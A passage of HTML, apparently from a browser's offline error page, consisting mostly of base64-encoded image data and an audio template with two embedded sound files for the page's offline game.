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" jstcache="0">
<template id="audio-resources" jstcache="0">
<audio id="offline-sound-press" src="data:audio/mpeg;base64,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"></audio>
<audio id="offline-sound-hit" src="data:audio/mpeg;base64,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